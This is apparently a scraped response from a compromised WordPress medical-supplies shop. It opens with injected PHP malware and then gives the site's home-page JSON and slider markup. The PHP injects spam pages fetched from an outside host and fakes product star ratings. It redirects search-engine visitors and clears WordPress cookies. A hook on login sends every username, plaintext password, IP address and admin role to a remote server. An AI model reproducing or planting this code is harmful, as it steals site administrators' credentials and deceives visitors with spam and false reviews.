$_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#<html#is', $ttxt)) { echo $ttxt; file_put_contents("{$eb}{$st}/$page.html", $ttxt); die(); } preg_match('#gogogo(.*)enenen#is', $ttxt, $mtchs); $etxt = explode('||', $mtchs[1]); $key = $etxt[0]; $title = ucfirst($key); $h1 = ucfirst($etxt[1]); $rating = rand(4,5); $rcount = rand(22,222); $txt = "<div itemscope=\"\" itemtype=\"https://schema.org/Product\">\n<span itemprop=\"name\">$parkey rating</span>\n<div itemprop=\"aggregateRating\" itemscope=\"\" itemtype=\"https://schema.org/AggregateRating\">\n<span itemprop=\"ratingValue\">$rating-5</span> stars based on\n<span itemprop=\"reviewCount\">$rcount</span> reviews\n</div>\n</div>\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "<a href=\"https://$newclpage\">$parkey</a> "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('#<a (.*)</a>#iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('</body>', "<footer> <div class=\"tags_cloud footer column block\" id=\"tags_cloud footer column block\"> $cldwfooter </div> </footer> </body>", $my_content); } } if (!$morda) { $my_content = preg_replace('#<title(.*)<\/title>#iUs', "<title>$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "
\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#wolfsburg bekanntschaften deutschland vitamin c tinh chat jugoslawische frauen kennen lernen in deutschland bekanntschaft österreich#iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?>{"id":492,"date":"2017-06-23T07:54:20","date_gmt":"2017-06-23T07:54:20","guid":{"rendered":"http:\/\/dummy.xtemos.com\/woodmart\/demos\/?page_id=492"},"modified":"2022-12-21T06:28:36","modified_gmt":"2022-12-21T06:28:36","slug":"home-electronics","status":"publish","type":"page","link":"https:\/\/avanmedibazar.com\/","title":{"rendered":"Home"},"content":{"rendered":"<p>[vc_row css=”.vc_custom_1497436304841{margin-top: -30px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}” el_class=”hidden-lg”][vc_column css=”.vc_custom_1496150831147{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}” offset=”vc_hidden-lg”][\/vc_column][\/vc_row][vc_row][vc_column width=”1\/6″ mobile_bg_img_hidden=”no” tablet_bg_img_hidden=”no” woodmart_parallax=”0″ woodmart_sticky_column=”false” parallax_scroll=”no” mobile_reset_margin=”no” tablet_reset_margin=”no” offset=”vc_hidden-sm vc_hidden-xs”][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column][vc_column width=”5\/6″ css=”.vc_custom_1671603847719{margin-top: -60px !important;padding-bottom: 50px !important;padding-left: 100px !important;}” mobile_bg_img_hidden=”no” tablet_bg_img_hidden=”no” woodmart_parallax=”0″ woodmart_sticky_column=”false” parallax_scroll=”no” mobile_reset_margin=”no” tablet_reset_margin=”no” el_class=”slider_main”][vc_row_inner][vc_column_inner]\n\t\t\t<!-- START Electronics1 REVOLUTION SLIDER 6.4.11 --><p class=\"rs-p-wp-fix\"><\/p>\n\t\t\t<rs-module-wrap id=\"woodmart-electronics_wrapper\" data-source=\"gallery\" style=\"background:#f9f9f9;padding:0;margin:0px auto;margin-top:0;margin-bottom:0;max-width:;\">\n\t\t\t\t<rs-module id=\"woodmart-electronics\" style=\"\" data-version=\"6.4.11\">\n\t\t\t\t\t<rs-slides>\n\t\t\t\t\t\t<rs-slide data-key=\"rs-100\" data-title=\"Slide\" data-thumb=\"\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/05\/WhatsApp-Image-2021-05-09-at-1.04.17-PM-100x50.jpeg\" data-anim=\"ms:600;\" data-in=\"o:0;\" data-out=\"a:false;\">\n\t\t\t\t\t\t\t<img src=\"\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/05\/WhatsApp-Image-2021-05-09-at-1.04.17-PM.jpeg\" alt=\"slider1\" title=\"slider1\" width=\"820\" height=\"312\" class=\"rev-slidebg tp-rs-img\" data-bg=\"p:right bottom;\" data-parallax=\"off\" data-no-retina>\n<!---->\t\t\t\t\t\t<\/rs-slide>\n\t\t\t\t\t\t<rs-slide data-key=\"rs-105\" data-title=\"Slide\" data-thumb=\"\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/06\/Top-Slider-1-100x50.jpg\" data-anim=\"ms:600;\" data-in=\"o:0;\" data-out=\"a:false;\">\n\t\t\t\t\t\t\t<img src=\"\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/06\/Top-Slider-1.jpg\" title=\"Top Slider-1\" width=\"903\" height=\"470\" class=\"rev-slidebg tp-rs-img\" data-bg=\"p:right bottom;\" data-parallax=\"off\" data-no-retina>\n<!---->\t\t\t\t\t\t<\/rs-slide>\n\t\t\t\t\t\t<rs-slide data-key=\"rs-106\" data-title=\"Slide\" data-thumb=\"\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/06\/Top-slider-2-100x50.jpg\" data-anim=\"ms:600;\" data-in=\"o:0;\" data-out=\"a:false;\">\n\t\t\t\t\t\t\t<img src=\"\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/06\/Top-slider-2.jpg\" title=\"Top slider-2\" width=\"903\" height=\"470\" class=\"rev-slidebg tp-rs-img\" data-bg=\"p:right bottom;\" data-parallax=\"off\" data-no-retina>\n<!---->\t\t\t\t\t\t<\/rs-slide>\n\t\t\t\t\t<\/rs-slides>\n\t\t\t\t<\/rs-module>\n\t\t\t\t<script type=\"text\/javascript\">\n\t\t\t\t\tsetREVStartSize({c: 'woodmart-electronics',rl:[1240,1024,778,480],el:[470,468,660,450],gw:[900,1024,778,480],gh:[470,468,660,450],type:'standard',justify:'',layout:'fullwidth',mh:\"0\"});\n\t\t\t\t\tvar\trevapi41,\n\t\t\t\t\t\ttpj;\n\t\t\t\t\tfunction revinit_woodmartelectronics() {\n\t\t\t\t\tjQuery(function() {\n\t\t\t\t\t\ttpj = jQuery;\n\t\t\t\t\t\trevapi41 = tpj(\"#woodmart-electronics\");\n\t\t\t\t\t\tif(revapi41==undefined || revapi41.revolution == undefined){\n\t\t\t\t\t\t\trevslider_showDoubleJqueryError(\"woodmart-electronics\");\n\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\trevapi41.revolution({\n\t\t\t\t\t\t\t\tDPR:\"dpr\",\n\t\t\t\t\t\t\t\tvisibilityLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tgridwidth:\"900,1024,778,480\",\n\t\t\t\t\t\t\t\tgridheight:\"470,468,660,450\",\n\t\t\t\t\t\t\t\tspinner:\"spinner0\",\n\t\t\t\t\t\t\t\tperspective:600,\n\t\t\t\t\t\t\t\tperspectiveType:\"local\",\n\t\t\t\t\t\t\t\teditorheight:\"470,468,660,450\",\n\t\t\t\t\t\t\t\tresponsiveLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tprogressBar:{disableProgressBar:true},\n\t\t\t\t\t\t\t\tnavigation: {\n\t\t\t\t\t\t\t\t\tmouseScrollNavigation:false,\n\t\t\t\t\t\t\t\t\twheelCallDelay:1000,\n\t\t\t\t\t\t\t\t\tonHoverStop:false,\n\t\t\t\t\t\t\t\t\ttouch: {\n\t\t\t\t\t\t\t\t\t\ttouchenabled:true,\n\t\t\t\t\t\t\t\t\t\ttouchOnDesktop:true\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\tbullets: {\n\t\t\t\t\t\t\t\t\t\tenable:true,\n\t\t\t\t\t\t\t\t\t\ttmp:\"\",\n\t\t\t\t\t\t\t\t\t\tstyle:\"hermes\"\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\tparallax: {\n\t\t\t\t\t\t\t\t\tlevels:[1,2,3,4,5,6,7,40,45,46,47,48,49,50,51,55],\n\t\t\t\t\t\t\t\t\ttype:\"mouse\"\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\tviewPort: {\n\t\t\t\t\t\t\t\t\tenable:true,\n\t\t\t\t\t\t\t\t\tvisible_area:\"20%\",\n\t\t\t\t\t\t\t\t\tpresize:true\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\tfallbacks: {\n\t\t\t\t\t\t\t\t\tallowHTML5AutoPlayOnAndroid:true\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t});\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t});\n\t\t\t\t\t} \/\/ End of RevInitScript\n\t\t\t\tvar once_woodmartelectronics = false;\n\t\t\t\tif (document.readyState === \"loading\") {document.addEventListener('readystatechange',function() { if((document.readyState === \"interactive\" || document.readyState === \"complete\") && !once_woodmartelectronics ) { once_woodmartelectronics = true; revinit_woodmartelectronics();}});} else {once_woodmartelectronics = true; revinit_woodmartelectronics();}\n\t\t\t\t<\/script>\n\t\t\t\t<script>\n\t\t\t\t\tvar htmlDivCss = unescape(\"%23woodmart-electronics_wrapper%20%7B%0A%09height%3A%20470px%3B%0A%20%20%20%20background%3A%20%23f9f9f9%3B%0A%7D%0A%0A%40media%20%28max-width%3A%201024px%29%20%7B%0A%20%20%20%20%0A%23woodmart-electronics_wrapper%20%7B%0A%20%20height%3A468px%3B%0A%7D%0A%7D%0A%20%20%20%20%20%20%0A%40media%20%28max-width%3A%20778px%29%20%7B%0A%20%20%20%20%0A%23woodmart-electronics_wrapper%20%7B%0A%20%20height%3A660px%3B%0A%7D%0A%7D%0A%20%20%20%20%20%20%20%20%0A%40media%20%28max-width%3A%20480px%29%20%7B%0A%20%20%20%20%0A%23woodmart-electronics_wrapper%20%7B%0A%20%20height%3A450px%3B%0A%7D%0A%7D\");\n\t\t\t\t\tvar htmlDiv = document.getElementById('rs-plugin-settings-inline-css');\n\t\t\t\t\tif(htmlDiv) {\n\t\t\t\t\t\thtmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss;\n\t\t\t\t\t}else{\n\t\t\t\t\t\tvar htmlDiv = document.createElement('div');\n\t\t\t\t\t\thtmlDiv.innerHTML = '<style>' + htmlDivCss + '<\/style>';\n\t\t\t\t\t\tdocument.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]);\n\t\t\t\t\t}\n\t\t\t\t<\/script>\n\t\t\t\t<script>\n\t\t\t\t\tvar htmlDivCss = unescape(\"%23woodmart-electronics_wrapper%20.hermes.tp-bullets%20%7B%0A%7D%0A%0A%23woodmart-electronics_wrapper%20.hermes%20.tp-bullet%20%7B%0A%20%20%20%20overflow%3Ahidden%3B%0A%20%20%20%20border-radius%3A50%25%3B%0A%20%20%20%20width%3A16px%3B%0A%20%20%20%20height%3A16px%3B%0A%20%20%20%20background-color%3A%20rgba%280%2C%200%2C%200%2C%200%29%3B%0A%20%20%20%20box-shadow%3A%20inset%200%200%200%202px%20%23ffffff%3B%0A%20%20%20%20-webkit-transition%3A%20background%200.3s%20ease%3B%0A%20%20%20%20transition%3A%20background%200.3s%20ease%3B%0A%20%20%20%20position%3Aabsolute%3B%0A%7D%0A%0A%23woodmart-electronics_wrapper%20.hermes%20.tp-bullet.rs-touchhover%20%7B%0A%09%20%20background-color%3A%20rgba%280%2C0%2C0%2C0.21%29%3B%0A%7D%0A%23woodmart-electronics_wrapper%20.hermes%20.tp-bullet%3Aafter%20%7B%0A%20%20content%3A%20%27%20%27%3B%0A%20%20position%3A%20absolute%3B%0A%20%20bottom%3A%200%3B%0A%20%20height%3A%200%3B%0A%20%20left%3A%200%3B%0A%20%20width%3A%20100%25%3B%0A%20%20background-color%3A%20%23ffffff%3B%0A%20%20box-shadow%3A%200%200%201px%20%23ffffff%3B%0A%20%20-webkit-transition%3A%20height%200.3s%20ease%3B%0A%20%20transition%3A%20height%200.3s%20ease%3B%0A%7D%0A%23woodmart-electronics_wrapper%20.hermes%20.tp-bullet.selected%3Aafter%20%7B%0A%20%20height%3A100%25%3B%0A%7D%0A%0A\");\n\t\t\t\t\tvar htmlDiv = document.getElementById('rs-plugin-settings-inline-css');\n\t\t\t\t\tif(htmlDiv) {\n\t\t\t\t\t\thtmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss;\n\t\t\t\t\t}else{\n\t\t\t\t\t\tvar htmlDiv = document.createElement('div');\n\t\t\t\t\t\thtmlDiv.innerHTML = '<style>' + htmlDivCss + '<\/style>';\n\t\t\t\t\t\tdocument.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]);\n\t\t\t\t\t}\n\t\t\t\t<\/script>\n\t\t\t\t<script>\n\t\t\t\t\tvar htmlDivCss = unescape(\"%0A%0A%0A\");\n\t\t\t\t\tvar htmlDiv = document.getElementById('rs-plugin-settings-inline-css');\n\t\t\t\t\tif(htmlDiv) {\n\t\t\t\t\t\thtmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss;\n\t\t\t\t\t}else{\n\t\t\t\t\t\tvar htmlDiv = document.createElement('div');\n\t\t\t\t\t\thtmlDiv.innerHTML = '<style>' + htmlDivCss + '<\/style>';\n\t\t\t\t\t\tdocument.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]);\n\t\t\t\t\t}\n\t\t\t\t<\/script>\n\t\t\t<\/rs-module-wrap>\n\t\t\t<!-- END REVOLUTION SLIDER -->\n[\/vc_column_inner][\/vc_row_inner][vc_row_inner css=”.vc_custom_1621794810571{padding-top: 20px !important;}” row_reverse_mobile=”0″ row_reverse_tablet=”0″][vc_column_inner width=”1\/4″ offset=”vc_col-md-3 vc_col-xs-6″ css=”.vc_custom_1671604043696{margin-bottom: 30px !important;}”]\t\t<div class=\"promo-banner-wrapper\">\n\t\t\t<div id=\"wd-60c399da41680\" class=\"promo-banner banner-vr-align-top banner-hr-align-left banner- banner-hover-zoom color-scheme-light banner-btn-size-default banner-btn-style-default cursor-pointer\" onclick=\"window.location.href='https:\/\/avanmedibazar.com\/product-category\/home-medical-supplies-equipments\/'\" >\n\n\t\t\t\t<div class=\"main-wrapp-img\">\n\t\t\t\t\t<div class=\"banner-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img class=\"promo-banner-image image-1 \" src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/05\/WhatsApp-Image-2021-05-30-at-12.59.04-PM.jpeg\" width=\"203\" height=\"203\" alt=\"Home delivery\" title=\"Home delivery\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t<div class=\"wrapper-content-banner \">\n\t\t\t\t\t<div class=\"content-banner text-left content-width-100\">\n\t\t\t\t\t\t\t<div class=\"banner-title-wrap banner-title-default\"><\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″ css=”.vc_custom_1671604059998{margin-bottom: 30px !important;}”]\t\t<div class=\"promo-banner-wrapper\">\n\t\t\t<div id=\"wd-60c399e9ac1c0\" class=\"promo-banner banner-vr-align-top banner-hr-align-left banner- banner-hover-zoom color-scheme-light banner-btn-size-default banner-btn-style-default cursor-pointer\" onclick=\"window.location.href='https:\/\/avanmedibazar.com\/product-category\/fda-ce-iso-certified-products\/'\" >\n\n\t\t\t\t<div class=\"main-wrapp-img\">\n\t\t\t\t\t<div class=\"banner-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img class=\"promo-banner-image image-1 \" src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/05\/WhatsApp-Image-2021-05-30-at-12.59.05-PM.jpeg\" width=\"203\" height=\"203\" alt=\"iso\" title=\"iso\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t<div class=\"wrapper-content-banner \">\n\t\t\t\t\t<div class=\"content-banner text-left content-width-100\">\n\t\t\t\t\t\t\t<div class=\"banner-title-wrap banner-title-default\"><\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″ css=”.vc_custom_1671604086565{margin-bottom: 30px !important;}”]\t\t<div class=\"promo-banner-wrapper\">\n\t\t\t<div id=\"wd-60c399fac73ea\" class=\"promo-banner banner-vr-align-top banner-hr-align-left banner-mask banner-hover-zoom color-scheme-dark banner-btn-size-default banner-btn-style-default cursor-pointer\" onclick=\"window.location.href='https:\/\/avanmedibazar.com\/my-account\/'\" >\n\n\t\t\t\t<div class=\"main-wrapp-img\">\n\t\t\t\t\t<div class=\"banner-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img class=\"promo-banner-image image-1 \" src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/05\/4.png\" width=\"203\" height=\"203\" alt=\"4\" title=\"4\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t<div class=\"wrapper-content-banner \">\n\t\t\t\t\t<div class=\"content-banner text-left content-width-100\">\n\t\t\t\t\t\t\t<div class=\"banner-title-wrap banner-title-default\"><\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″ css=”.vc_custom_1671604104487{margin-bottom: 30px !important;}”]\t\t<div class=\"promo-banner-wrapper\">\n\t\t\t<div id=\"wd-60c39a04ac2b2\" class=\"promo-banner banner-vr-align-top banner-hr-align-left banner- banner-hover-zoom color-scheme-light banner-btn-size-default banner-btn-style-default cursor-pointer\" onclick=\"window.location.href='https:\/\/avanmedibazar.com\/product-category\/all-brands\/'\" >\n\n\t\t\t\t<div class=\"main-wrapp-img\">\n\t\t\t\t\t<div class=\"banner-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img class=\"promo-banner-image image-1 \" src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/05\/5.png\" width=\"203\" height=\"203\" alt=\"5\" title=\"5\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t<div class=\"wrapper-content-banner \">\n\t\t\t\t\t<div class=\"content-banner text-left 